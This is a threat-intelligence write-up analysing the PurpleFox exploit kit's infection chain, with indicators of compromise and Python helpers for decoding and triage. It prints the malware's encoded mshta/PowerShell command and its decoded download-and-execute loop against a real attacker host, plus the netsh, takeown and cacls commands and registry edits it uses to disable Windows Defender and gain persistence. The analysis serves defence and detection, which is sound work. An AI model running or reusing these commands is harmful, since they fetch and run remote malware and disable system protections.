
Emerging Threats

PurpleFox: analysis of the compromise chain

· frtg · 7 min read

In January 2021, we detected and managed security alerts related to workstation compromise attempts executed through the PurpleFox Exploit Kit.

The following image represents the compromise schema we observed during our analysis:

Exploit Kit & Purple Fox

An Exploit Kit is a toolkit of offensive instruments used by threat actors to compromise workstations during Internet browsing. The kit typically exploits vulnerabilities in browsers and software such as Adobe Flash, Java, and Microsoft Silverlight.

PurpleFox is an exploit kit designed to execute PowerShell code that downloads rootkit malware. It was first identified in 2018; the following technical articles address this threat:

The Compromise Chain

1. Compromise Initiation

As observed in previous analyses, the attack originates during navigation to the web page hxxp://speedjudgmentacceleration[.]com .

After an Adobe Flash vulnerability is exploited, the workstation compromise chain starts with the command:

mshta vbscript:createobject("wscript.shell").run("PowerShell -nop -windowstyle hidden -exec bypass -EncodedCommand DQAKAGYAbwByACgAJABpAD0AMQA7ACQAaQAgAC0AbABlACAAMQAwADsAJABpACsAKwApAA0ACgB7AA0ACgBpAGUAeAAoAG4AZQB3AC0AbwBiAGoAZQBjAHQAIABuAGUAdAAuAHcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AcgBhAHcAYwBkAG4ALgBnAGkAdABoAGEAYwBrAC4AYwB5AG8AdQAvAHUAcAAuAHAAaABwAD8AawBlAHkAPQAxACIAKQANAAoAUwB0AGEAcgB0AC0AUwBsAGUAZQBwACAAMQA4ADAADQAKAH0ADQAKAA==",0)(window.close)

Decoding the base64 argument (UTF-16LE text, which is what PowerShell expects after -EncodedCommand) yields:

for($i=1;$i -le 10;$i++)
{
iex(new-object net.webclient).downloadstring("http://rawcdn.githack.cyou/up.php?key=1")
Start-Sleep 180
}

This loop tries up to 10 times, sleeping 180 seconds between attempts, to download and execute (via iex) the next stage hosted at hxxp://rawcdn[.]githack[.]cyou/up[.]php?key=1, which contains further instructions for the final payload.
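As an added triage example (not part of the original analysis), the following Python pulls the -EncodedCommand argument out of a process-creation command line, decodes it as UTF-16LE the way PowerShell does, and lists the URLs the hidden script contacts. The sample command line is the mshta one-liner shown above; the flag abbreviations in the regex are an assumption covering the common short forms.

```python
import base64
import re

# Command line of the mshta one-liner analysed above (copied from the page).
OBSERVED_CMDLINE = (
    'mshta vbscript:createobject("wscript.shell").run("PowerShell -nop '
    '-windowstyle hidden -exec bypass -EncodedCommand '
    'DQAKAGYAbwByACgAJABpAD0AMQA7ACQAaQAgAC0AbABlACAAMQAwADsAJABpACsAKwApAA0ACgB7AA0ACgBpAGUAeAAoAG4AZQB3AC0AbwBiAGoAZQBjAHQAIABuAGUAdAAuAHcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AcgBhAHcAYwBkAG4ALgBnAGkAdABoAGEAYwBrAC4AYwB5AG8AdQAvAHUAcAAuAHAAaABwAD8AawBlAHkAPQAxACIAKQANAAoAUwB0AGEAcgB0AC0AUwBsAGUAZQBwACAAMQA4ADAADQAKAH0ADQAKAA=="'
    ',0)(window.close)'
)

# powershell.exe accepts unambiguous prefixes of -EncodedCommand; these are the
# short forms commonly seen in telemetry (assumption: extend if you see others).
_ENC_FLAG = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)
_URL = re.compile(r"""https?://[^\s"'<>()]+""")


def extract_encoded_command(cmdline: str):
    """Return the base64 argument that follows -EncodedCommand, or None."""
    m = _ENC_FLAG.search(cmdline)
    return m.group(1) if m else None


def decode_encoded_command(b64: str) -> str:
    """Decode as PowerShell does: base64 wrapping UTF-16LE text."""
    raw = base64.b64decode(b64, validate=True)
    if len(raw) % 2:
        raise ValueError("payload is not UTF-16LE (odd byte count)")
    return raw.decode("utf-16-le")


def triage(cmdline: str) -> dict:
    """Decode the hidden script and summarise it for an analyst."""
    b64 = extract_encoded_command(cmdline)
    if b64 is None:
        return {"encoded": False, "script": "", "urls": [], "downloads_and_runs": False}
    script = decode_encoded_command(b64)
    lowered = script.lower()
    return {
        "encoded": True,
        "script": script,
        "urls": _URL.findall(script),
        # iex + downloadstring is the download-and-run pattern of this stage
        "downloads_and_runs": "downloadstring" in lowered and "iex" in lowered,
    }


if __name__ == "__main__":
    result = triage(OBSERVED_CMDLINE)
    print(result["script"])
    print("URLs contacted:", result["urls"])
```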

2. System Modifications and Controls

The script begins by defining a new .NET type that imports the MsiInstallProduct and MsiSetInternalUI functions from msi.dll: the first installs the malware, the second suppresses the installer pop-up.

Subsequently, the script defines a command block that will be converted to a string and base64-encoded. The command set is used to download and install, via MsiInstallProduct, one of two resources present in $msipathALL. The entire operation is placed in a loop that terminates only when the registry value HKCU:\Software\7-Zip\StayOnTop is found.

Both resources, despite presenting different file extensions, are identical MSI files (same hash). This is the final payload for endpoint compromise:

SHA-256 d88ce4ccca6bc536dd3b80374be5e3f5ec9ffd96dc122352386dd4ca9af01cfc

3. Administrative privilege verification

Before executing the encoded command through a new PowerShell call, the malware verifies possession of administrative privileges:

If the check fails, an architecture-specific script containing exploits is downloaded and executed to attempt local privilege escalation (T1548.004):

  • x32 hxxp://rawcdn[.]githack[.]cyou/up[.]php?key=3
  • x64 hxxp://rawcdn[.]githack[.]cyou/up[.]php?key=4

4. The role of the MSI file

The rootkit is downloaded from the URLs:

  • hxxp://rawcdn[.]githack[.]cyou/up.php?key=2
  • hxxp://rawcdn[.]githack[.]com/x7hGFE28oiG8kDre/BGuoFr0ACb9E0frq/afb90fd8276b3530cf1e526e60f8e1d61077e2a5/M001.jpg

As previously highlighted, both files are the same dropper in the form of an MSI installer that, during the installation process, creates the following files on the system:

  • a file with .ini extension
  • a file with .log or .xml extension (based on system architecture)

The MSI malware, after saving the two files, performs several modifications to the system registry:

  • creates the value HKCU:\Software\7-Zip\StayOnTop which will be used as a control to verify successful installation
  • disables Windows Defender by creating the values
    HKCU\SOFTWARE\Policies\Microsoft\Windows Defender\DisableAntiSpyware
    HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\DisableAntiSpyware
  • queues file operations to run at the next restart via
    HKLM\System\CurrentControlSet\Control\Session Manager\PendingFileRenameOperations
    (source/destination pairs; an empty destination deletes the source):
    \??\C:\Windows\AppPatch\Acpsens.dll, ,
    \??\C:\Windows\system32\sens.dll, \??\C:\Windows\AppPatch\Acpsens.dll,
    \??\C:\Windows\system32\sens.dll, ,
    \??\C:\Windows\.xml, \??\C:\Windows\system32\sens.dll,
    \??\C:\Windows\AppPatch\Ke583427.xsl, ,
    \??\C:\Windows\.ini, \??\C:\Windows\AppPatch\Ke583427.xsl
    The net effect at reboot: the original sens.dll is moved aside to AppPatch\Acpsens.dll, the dropped .xml file takes its place as system32\sens.dll, and the dropped .ini file becomes AppPatch\Ke583427.xsl.
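To make a PendingFileRenameOperations value readable during triage, here is an added example (not from the original analysis) that pairs the REG_MULTI_SZ strings into source/destination operations and flags any that touch a protected system directory. The sample list is constructed from the entries above; the dropper's own file names are not given on the page, so PLACEHOLDER stands in for them.

```python
# Constructed REG_MULTI_SZ value mirroring the entries listed above. Entries
# alternate source, destination; an empty destination means "delete source".
# PLACEHOLDER replaces the dropped file names, which the page does not give.
SAMPLE_MULTI_SZ = [
    "\\??\\C:\\Windows\\AppPatch\\Acpsens.dll", "",
    "\\??\\C:\\Windows\\system32\\sens.dll", "\\??\\C:\\Windows\\AppPatch\\Acpsens.dll",
    "\\??\\C:\\Windows\\system32\\sens.dll", "",
    "\\??\\C:\\Windows\\PLACEHOLDER.xml", "\\??\\C:\\Windows\\system32\\sens.dll",
    "\\??\\C:\\Windows\\AppPatch\\Ke583427.xsl", "",
    "\\??\\C:\\Windows\\PLACEHOLDER.ini", "\\??\\C:\\Windows\\AppPatch\\Ke583427.xsl",
]

# Directories where a queued rename or delete outside of patching is suspicious;
# sens.dll, the file this dropper swaps, lives in system32.
PROTECTED_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\")


def _strip_nt(path: str) -> str:
    """Drop the \\??\\ NT-namespace prefix that MoveFileEx writes into the value."""
    return path[4:] if path.startswith("\\??\\") else path


def parse_pending_renames(multi_sz):
    """Pair the MULTI_SZ strings into ordered operations (delete or rename)."""
    ops = []
    for i in range(0, len(multi_sz), 2):
        src = _strip_nt(multi_sz[i])
        dst_raw = multi_sz[i + 1] if i + 1 < len(multi_sz) else ""
        # A leading '!' on the destination means MOVEFILE_REPLACE_EXISTING.
        replace = dst_raw.startswith("!")
        dst = _strip_nt(dst_raw[1:] if replace else dst_raw)
        ops.append({"op": "delete" if dst == "" else "rename",
                    "src": src, "dst": dst, "replace_existing": replace})
    return ops


def suspicious_ops(ops):
    """Operations that remove, move or overwrite a file under a protected dir."""
    def protected(p):
        return p.lower().startswith(PROTECTED_DIRS)
    return [o for o in ops if protected(o["src"]) or protected(o["dst"])]


if __name__ == "__main__":
    for o in suspicious_ops(parse_pending_renames(SAMPLE_MULTI_SZ)):
        print(o["op"], o["src"], "->", o["dst"] or "(deleted)")
```

On a live host the same list is what winreg.QueryValueEx returns for that value, so the parser can be pointed at it directly.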

5. System modifications

Finally, the malware uses netsh to assign an IPsec policy (named qianye) whose filter list covers inbound TCP 135 and UDP 445 and outbound TCP connections to a set of high ports, then takes ownership of jscript.dll and cscript.exe and denies Everyone access to them with cacls. Detecting these registry, IPsec and file-permission changes through Managed Detection and Response capabilities enables rapid identification of post-exploitation persistence mechanisms (T1547.001, T1112).

"C:\Windows\SysWOW64\netsh.exe" ipsec static add filterlist name=Filter1
"C:\Windows\SysWOW64\netsh.exe" ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=135 protocol=TCP
"C:\Windows\SysWOW64\netsh.exe" ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=445 protocol=UDP
"C:\Windows\SysWOW64\netsh.exe" ipsec static add filter filterlist=Filter1 srcaddr=Me dstaddr=any dstport=2222 protocol=TCP
"C:\Windows\SysWOW64\netsh.exe" ipsec static add filter filterlist=Filter1 srcaddr=Me dstaddr=any dstport=3333 protocol=TCP
"C:\Windows\SysWOW64\netsh.exe" ipsec static add filter filterlist=Filter1 srcaddr=Me dstaddr=any dstport=4444 protocol=TCP
"C:\Windows\SysWOW64\netsh.exe" ipsec static add filter filterlist=Filter1 srcaddr=Me dstaddr=any dstport=5555 protocol=TCP
"C:\Windows\SysWOW64\netsh.exe" ipsec static add filter filterlist=Filter1 srcaddr=Me dstaddr=any dstport=6666 protocol=TCP
"C:\Windows\SysWOW64\netsh.exe" ipsec static add filter filterlist=Filter1 srcaddr=Me dstaddr=any dstport=8888 protocol=TCP
"C:\Windows\SysWOW64\netsh.exe" ipsec static add filter filterlist=Filter1 srcaddr=Me dstaddr=any dstport=9000 protocol=TCP
"C:\Windows\SysWOW64\netsh.exe" ipsec static add filter filterlist=Filter1 srcaddr=Me dstaddr=any dstport=9999 protocol=TCP
"C:\Windows\SysWOW64\netsh.exe" ipsec static add rule name=Rule1 policy=qianye filterlist=Filter1 filteraction=FilteraAtion1
"C:\Windows\SysWOW64\netsh.exe" ipsec static set policy name=qianye assign=y
"C:\Windows\SysWOW64\takeown.exe" /f C:\Windows\system32\jscript.dll
"C:\Windows\SysWOW64\cacls.exe" C:\Windows\system32\jscript.dll /E /P everyone:N
"C:\Windows\SysWOW64\takeown.exe" /f C:\Windows\syswow64\jscript.dll
"C:\Windows\SysWOW64\cacls.exe" C:\Windows\syswow64\jscript.dll /E /P everyone:N
"C:\Windows\SysWOW64\takeown.exe" /f C:\Windows\system32\cscript.exe
"C:\Windows\SysWOW64\cacls.exe" C:\Windows\system32\cscript.exe /E /P everyone:N
"C:\Windows\SysWOW64\takeown.exe" /f C:\Windows\syswow64\cscript.exe
"C:\Windows\SysWOW64\cacls.exe" C:\Windows\syswow64\cscript.exe /E /P everyone:N

The malware concludes its activities by executing the command: 

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Start-Sleep -Seconds 900; Restart-Computer -Force

which restarts the system after 15 minutes; at reboot the queued PendingFileRenameOperations put the malicious sens.dll in place, forcing it to be loaded.

This library is central to persistence and control of the compromised system. Because sens.dll is loaded as a service, the malware starts inside a newly created svchost process, into which its shellcode is then injected.

Indicators of Compromise

SHA-256

  • d88ce4ccca6bc536dd3b80374be5e3f5ec9ffd96dc122352386dd4ca9af01cfc MSI installer
  • 9845e02032d02130bde3ffe2a16ec9706893aa9c8db5712beed6f129a74ffb35 sens.dll (x64)
  • bcefd583e2562fbf38b28118eda0957ac96c3945d12868eaa9bc06f93da5e4db sens.dll (x32)

Domains

  • speedjudgmentacceleration[.]com
  • rawcdn[.]githack[.]cyou
  • rawcdn[.]githack[.]com

Defensive teams should prioritize detection of IPsec filter manipulation (T1562.004, Impair Defenses: Disable or Modify System Firewall) combined with DLL injection patterns targeting system libraries, since that combination indicates post-exploitation persistence activity.
